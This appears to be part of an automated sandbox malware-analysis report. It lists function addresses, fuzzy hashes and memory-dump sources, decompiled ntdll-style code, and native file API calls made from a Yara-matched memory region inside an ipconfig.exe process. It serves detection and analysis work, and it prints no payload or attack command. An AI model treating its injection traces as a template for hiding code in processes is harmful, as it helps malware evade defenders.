Opcode Fuzzy Hash: c56dc5ce58e78f7d41429056d091c1210584cdd06e73ac477f79eb1caa76fa66
Instruction Fuzzy Hash: 3190027520508842E900A5995904A87000597D0349F55D452A14186ACD87948C69B175

Uniqueness

Uniqueness Score: -1.00%

Function 03889A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c611806c85a4ccc0050e327cab276d0253ff020f24732dd776d8c260dcdceffa
Instruction ID: 686775007da7c33e99bd090e6770be19c76881dcea87f6d8b7ea0080ccd10b15
Opcode Fuzzy Hash: c611806c85a4ccc0050e327cab276d0253ff020f24732dd776d8c260dcdceffa
Instruction Fuzzy Hash: 6990026120148842E540A2994904B0F410597E1246F95C05AA514A664CCA558C5D6775

Uniqueness

Uniqueness Score: -1.00%

Function 038896D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc5113d341b3568c81c95e3ee4c52cba579e03abe5e6c74760bb404182af5b35
Instruction ID: 1c6065c24c2cbd16816e5f9524ad4579fd9fe7673d8d3bc99cca2f7fbfc34be6
Opcode Fuzzy Hash: cc5113d341b3568c81c95e3ee4c52cba579e03abe5e6c74760bb404182af5b35
Instruction Fuzzy Hash: 1890027120104C42E500A1994504B46000597E0345F55C057A1118764D8755CC597575

Uniqueness

Uniqueness Score: -1.00%

Function 03889610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fdd8d51b45c3fde9c8396debfa05d8471a9d3bd4ff2adc24f68026f8fdc29f2
Instruction ID: 9811bc2d112f1b2fe1ad4b09c9b41afc0a8f1ec3ec76a94b12471a35ebc18c1c
Opcode Fuzzy Hash: 6fdd8d51b45c3fde9c8396debfa05d8471a9d3bd4ff2adc24f68026f8fdc29f2
Instruction Fuzzy Hash: 2E90027160504C02E550B1994514746000597D0345F55C052A1018764D87958E5D76F5

Uniqueness

Uniqueness Score: -1.00%

Function 03889A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d74dfdf7616b7fe0818418d6c516fd69f8da7a6c888eaab66e13dc13e52448be
Instruction ID: 421dd2a8165d940673b3bfade8b1e979d4de405298df47b67df675d9b2a5ecb8
Opcode Fuzzy Hash: d74dfdf7616b7fe0818418d6c516fd69f8da7a6c888eaab66e13dc13e52448be
Instruction Fuzzy Hash: E690027120144802E500A1994908747000597D0346F55C052A6158665E87A5CC997575

Uniqueness

Uniqueness Score: -1.00%

Function 03889650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7cdab74625e3f042456f1be323d7a57fd0c68ab3182cf685ecdcbc7b9debde7
Instruction ID: 9f0d417f82f0e33bfaa40011e57e553fa28148bcfa3ca1978a5a032c316f43cf
Opcode Fuzzy Hash: c7cdab74625e3f042456f1be323d7a57fd0c68ab3182cf685ecdcbc7b9debde7
Instruction Fuzzy Hash: FE90027120508C42E540B1994504A46001597D0349F55C052A10587A4D97658D5DB6B5

Uniqueness

Uniqueness Score: -1.00%

Function 038899D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b55170dec5f16c8af18fb69e630de6a3e4482e7f9b90e3d29c0960812e8a805
Instruction ID: e9ec11a086a65ad98e8afb0a9dc7d2f451a763e8e42ddfc5309e1d8b278ee5b9
Opcode Fuzzy Hash: 8b55170dec5f16c8af18fb69e630de6a3e4482e7f9b90e3d29c0960812e8a805
Instruction Fuzzy Hash: 559002A121104442E504A1994504706004597E1245F55C053A3148664CC6698C696179

Uniqueness

Uniqueness Score: -1.00%

Function 038895F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06f7f5f24a70add7508630c8edf36ecb4775250ed6bcb4ced696c5c32dcb563d
Instruction ID: 66d2ecd3e187e6cbdcf8bf40af52a05a00d4e6bdc39fd8f3ca4818598d360134
Opcode Fuzzy Hash: 06f7f5f24a70add7508630c8edf36ecb4775250ed6bcb4ced696c5c32dcb563d
Instruction Fuzzy Hash: 8D90027120104C02E504A1994904686000597D0345F55C052A7018765E97A58C997175

Uniqueness

Uniqueness Score: -1.00%

Function 03889520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 883e981a1b30b909a1386d7baae904f7838aad4fefe3ec883185dbda1a159783
Instruction ID: 965067d1d79fce3c7a38ad4e0c8d83345cb00620f736e8f97f4fafc3a1a1d136
Opcode Fuzzy Hash: 883e981a1b30b909a1386d7baae904f7838aad4fefe3ec883185dbda1a159783
Instruction Fuzzy Hash: 0A9002E1201184925900E2998504B0A450597E0245B55C057E2048670CC6658C59A179

Uniqueness

Uniqueness Score: -1.00%

Function 0388AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d099c24c00ac3174ef097d6e3fefb2268c194fc9f419f7891a8fbfac3c698aea
Instruction ID: c047f981d0274db7c67e96895ac956b15eb903b1c5bd1e26c6ce2551de56a601
Opcode Fuzzy Hash: d099c24c00ac3174ef097d6e3fefb2268c194fc9f419f7891a8fbfac3c698aea
Instruction Fuzzy Hash: 6A900271A0504412A540B19949146464006A7E0785B59C052A1508664C8A948E5D63F5

Uniqueness

Uniqueness Score: -1.00%

Function 03889950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d0e9f9700c2ec56b481e82de655e88bc5b308a0aa8f357edb6f72a90778e6f0
Instruction ID: bb9397682ff26cfd7ed6f870dd4ae05ccfe15ce4d3b1442f6fd15a8c3979ceae
Opcode Fuzzy Hash: 2d0e9f9700c2ec56b481e82de655e88bc5b308a0aa8f357edb6f72a90778e6f0
Instruction Fuzzy Hash: E09002A120144803E540A5994904607000597D0346F55C052A3058665E8B698C597179

Uniqueness

Uniqueness Score: -1.00%

Function 03889560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d396aa2a70d852253161a7479d455f8741211c112bef5a65cf7076c3297f3e9
Instruction ID: f69dacb2d2181ae05acdfb9a4a8b5c491ec9aa20bbb82c9b7120691ebf44aae6
Opcode Fuzzy Hash: 0d396aa2a70d852253161a7479d455f8741211c112bef5a65cf7076c3297f3e9
Instruction Fuzzy Hash: E8900265221044021545E599070450B0445A7D6395395C056F240A6A0CC7618C6D6375

Uniqueness

Uniqueness Score: -1.00%

Function 038898A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9762f140935ba664bea689b1c6df57cbc55c2f978705b6fa19de185fa52fe547
Instruction ID: 697f751158793887633bca97454fb260c9d4c04bdd4c528241c3e526cf2004b8
Opcode Fuzzy Hash: 9762f140935ba664bea689b1c6df57cbc55c2f978705b6fa19de185fa52fe547
Instruction Fuzzy Hash: 3790026130104802E502A19945146060009D7D1389F95C053E2418665D87658D5BB176

Uniqueness

Uniqueness Score: -1.00%

Function 03889820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f079264d90a56b7c095238b4522b7e88da7d260af1a3ee22edbea30f01ec2544
Instruction ID: a806979ac8e9618edd85c4cc42abe8db8a9be368da626e0b850ee60b7c7d400d
Opcode Fuzzy Hash: f079264d90a56b7c095238b4522b7e88da7d260af1a3ee22edbea30f01ec2544
Instruction Fuzzy Hash: A490027124104802E541B19945046060009A7D0285F95C053A1418664E87958E5EBAB5

Uniqueness

Uniqueness Score: -1.00%

Function 0388B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b60c3aa40a129f85bcea5b3bda04c5769e4d20504e7b910ac562dc0b115fe6
Instruction ID: c7eed389960654ff7705749c9079b58a8e3e4acaea31645effbdd5766e653370
Opcode Fuzzy Hash: 98b60c3aa40a129f85bcea5b3bda04c5769e4d20504e7b910ac562dc0b115fe6
Instruction Fuzzy Hash: 609002A1601184435940F19949044065015A7E1345395C162A1448670C87A88C5DA2B9

Uniqueness

Uniqueness Score: -1.00%

Function 03889670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 00a8a0fccebfc5c23ffb97b26eb06533b71ff05b1204e9ecb07379d7907dfbf4
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 038DFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E038DFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0388CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E038D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E038D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x038dfdda
0x038dfde2
0x038dfde5
0x038dfdec
0x038dfdfa
0x038dfdff
0x038dfe0a
0x038dfe0f
0x038dfe17
0x038dfe1e
0x038dfe19
0x038dfe19
0x038dfe19
0x038dfe20
0x038dfe21
0x038dfe22
0x038dfe25
0x038dfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 038DFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038DFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038DFE01

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 348012486fe8436b300d143ff92180fb8b50ce6f6e983dd9b0bed90b6b69d55c
Instruction ID: f16d1c4dc1ff27bbaaa56569c4417f62c7a0d665eee5bc4e168b1859a6bb6295
Opcode Fuzzy Hash: 348012486fe8436b300d143ff92180fb8b50ce6f6e983dd9b0bed90b6b69d55c
Instruction Fuzzy Hash: 28F0FC36140201BFDA205BC5DC01F23BB5AEB45730F244355F6249A2D1DA62F82096F1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ipconfig.exe PID: 1904 Parent PID: 3424 ipconfig.exeCOMMON

Executed Functions

Function 0016984A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00164CC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00164CC7,007A002E,00000000,00000060,00000000,00000000), ref: 0016989D

Strings

.z`, xrefs: 0016988D, 00169898

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: fe40327610f653e86f47e6d4d6ecdd34afb52e4ae6e608fdf8004628b00e6c40
Instruction ID: edca214713e658c2f988d21580dbc98e29a2270da2ded2fc25bbc4ce11f5501c
Opcode Fuzzy Hash: fe40327610f653e86f47e6d4d6ecdd34afb52e4ae6e608fdf8004628b00e6c40
Instruction Fuzzy Hash: C401AFB6214208ABDB08CF88DC95EEB37E9AF8C754F158248FA0997241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00169850, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00164CC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00164CC7,007A002E,00000000,00000060,00000000,00000000), ref: 0016989D

Strings

.z`, xrefs: 0016988D, 00169898

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 7d814ede187caa3bfefc2e1f6e75590161cd1206157db6b262b9f4a0f48dedcf
Instruction ID: 8f3d59459e5f73cdd26befb40d57cdb6998e7e9e59cd7ce44174fb508c404d99
Opcode Fuzzy Hash: 7d814ede187caa3bfefc2e1f6e75590161cd1206157db6b262b9f4a0f48dedcf
Instruction Fuzzy Hash: BCF0B2B2210208ABCB08CF88DC95EEB77EDAF8C754F158248BA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 001698FB, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00164E82,5EAE5221,FFFFFFFF,00164B41,?,?,00164E82,?,00164B41,FFFFFFFF,5EAE5221,00164E82,?,00000000), ref: 00169945

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: a5d65ca01585475628516bc5d1d2512f10f0726502919e22f99f0e3d2a185315
Instruction ID: ada168df11e575705e6adb00228ebe75255c2d5255cd93d23d3bcb4c6f2523e8
Opcode Fuzzy Hash: a5d65ca01585475628516bc5d1d2512f10f0726502919e22f99f0e3d2a185315
Instruction Fuzzy Hash: 98F0F4B6200108AFCB14CF99CC81EEB77A9EF8C354F158248FE1DA7241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00169900, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00164E82,5EAE5221,FFFFFFFF,00164B41,?,?,00164E82,?,00164B41,FFFFFFFF,5EAE5221,00164E82,?,00000000), ref: 00169945

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: db6174dcfd525ae651f91b33f319fdf8a08e0831768aef8947e4ea564bbe5761
Instruction ID: f8a0f002aa15182717a957badf78ea30502e017c3e161ec4493ca2a0c9bf7c4b
Opcode Fuzzy Hash: db6174dcfd525ae651f91b33f319fdf8a08e0831768aef8947e4ea564bbe5761
Instruction Fuzzy Hash: DCF0A4B2210208ABDB14DF89DC91EEB77ADAF8C754F158248BE1DA7241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0016997A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00164E60,?,?,00164E60,00000000,FFFFFFFF), ref: 001699A5

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d5a9ac64beb35600f68e892e4583ace0c5c38c199e05ff1ee31b0804f12a14de
Instruction ID: a5ecc12757c61ace17de521cd9f236332f48ae911d3095cbb730491a6f2f655f
Opcode Fuzzy Hash: d5a9ac64beb35600f68e892e4583ace0c5c38c199e05ff1ee31b0804f12a14de
Instruction Fuzzy Hash: CEE0C2312002046FE710EBD4CC85FD73758EF84714F004495BB085F282C530E6008BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00169980, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00164E60,?,?,00164E60,00000000,FFFFFFFF), ref: 001699A5

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 82e75157e6be96d350133ec88aebc56c6c368b7e8a00e2863a9e7236f6b9fcd2
Instruction ID: 4a5f6aae93608939b3a5d0818e3bebc1e87b93528b82a9b542c3cfcf7c37eb30
Opcode Fuzzy Hash: 82e75157e6be96d350133ec88aebc56c6c368b7e8a00e2863a9e7236f6b9fcd2
Instruction Fuzzy Hash: 99D012752002146BD710EB98CC45E97779CEF44750F554455BA185B242C530F51086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00BC986A

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 88c4483c27ddf84a668c59f0e5b18e9fac0e6caf0c8325370e14e5f487fc5538
Instruction ID: 294b0b39b81110322923727ef215f9ffdfef5ff80384647ef5a0440367b100ee
Opcode Fuzzy Hash: 88c4483c27ddf84a668c59f0e5b18e9fac0e6caf0c8325370e14e5f487fc5538
Instruction Fuzzy Hash: AC90027225100413D211615945047074049D7D0381F95C467A0814568DA6968962F161

Uniqueness

Uniqueness Score: -1.00%

Function 00BC9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00BC984A

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6e3b547389833efa6879e8ff2c2705f3d2a829db8aeb13f80f71288d07b16090
Instruction ID: f55aecdc2d03696a321ee758606eea3c0cb25825194ff0ee4c432b7dc2597e71
Opcode Fuzzy Hash: 6e3b547389833efa6879e8ff2c2705f3d2a829db8aeb13f80f71288d07b16090
Instruction Fuzzy Hash: 94900262292041525645B15944045078046E7E0381B95C067A1804960C95669866E661

Uniqueness

Uniqueness Score: -1.00%

Function 00BC99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00BC99AA

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 64bb7cf9ded96a0b5ef7121331df7fca2ac109d6a630f838122d2216e55cba2f
Instruction ID: afe217c8f2219be0e8ae0a2b56cadabc0756f15b22791d5a12d7b1aea256020c
Opcode Fuzzy Hash: 64bb7cf9ded96a0b5ef7121331df7fca2ac109d6a630f838122d2216e55cba2f
Instruction Fuzzy Hash: 239002A239100442D20061594414B064045D7E1341F55C06AE1454564D9659CC62B166

Uniqueness

Uniqueness Score: -1.00%

Function 00BC9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00BC991A

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b1fc357baa5df7931375e5e252955d536c6a870b78b087e71678a36b0bf9d997
Instruction ID: 732c96e33de6ca7d53845787b67a31f94457c6cb2c6edc1e626f823079bed769
Opcode Fuzzy Hash: b1fc357baa5df7931375e5e252955d536c6a870b78b087e71678a36b0bf9d997
Instruction Fuzzy Hash: 749002B225100402D240715944047464045D7D0341F55C066A5454564E96998DE5B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00BC9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00BC9A5A

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a54c434ba662cf39f90d9ad88482a3d7604eea249c837245d548f976fd103d80
Instruction ID: 1a0363723a7231711bd3d2da186631bdc03f01597fe895ade55dc692b8876262
Opcode Fuzzy Hash: a54c434ba662cf39f90d9ad88482a3d7604eea249c837245d548f976fd103d80
Instruction Fuzzy Hash: E490026226180042D30065694C14B074045D7D0343F55C16AA0544564CD9558871A561

Uniqueness

Uniqueness Score: -1.00%

Function 00BC9B00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00BC9B0A

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f0856e5d6b12ce8fad477715d47435fe447e7a55b1bbaeb8e14aa9208df1b5a2
Instruction ID: dece7d72c13e779bb5eea0abc9f302f8bcb4b53a541df4cc24f46c0fa714ece7
Opcode Fuzzy Hash: f0856e5d6b12ce8fad477715d47435fe447e7a55b1bbaeb8e14aa9208df1b5a2
Instruction Fuzzy Hash: 9A90026229100802D240715984147074046D7D0741F55C066A0414564D96568975B6F1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00BC95DA

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: faf2ace88a97e573d7c2811d4586c8e7f623d17c1b468475a9adf7510dec71df
Instruction ID: 659877cb16e9913adf2d8b16d1c61669029eb811df4a933cbf8a86de383c3c5d
Opcode Fuzzy Hash: faf2ace88a97e573d7c2811d4586c8e7f623d17c1b468475a9adf7510dec71df
Instruction Fuzzy Hash: EB9002A225200003420571594414616804AD7E0341F55C076E14045A0DD56588A1B165

Uniqueness

Uniqueness Score: -1.00%

Function 00BC9560, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00BC956A

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c4b531e202477f4ec1ef7aa65584c13d0f6a8b190e127920993e50c59aa791c4
Instruction ID: f95075ed3c91e20a8be4dd35915234c28b050ab1c53e30cee1803494f9889d49
Opcode Fuzzy Hash: c4b531e202477f4ec1ef7aa65584c13d0f6a8b190e127920993e50c59aa791c4
Instruction Fuzzy Hash: BB900266271000020245A559060450B4485E7D6391795C06AF18065A0CD6618875A361

Uniqueness

Uniqueness Score: -1.00%

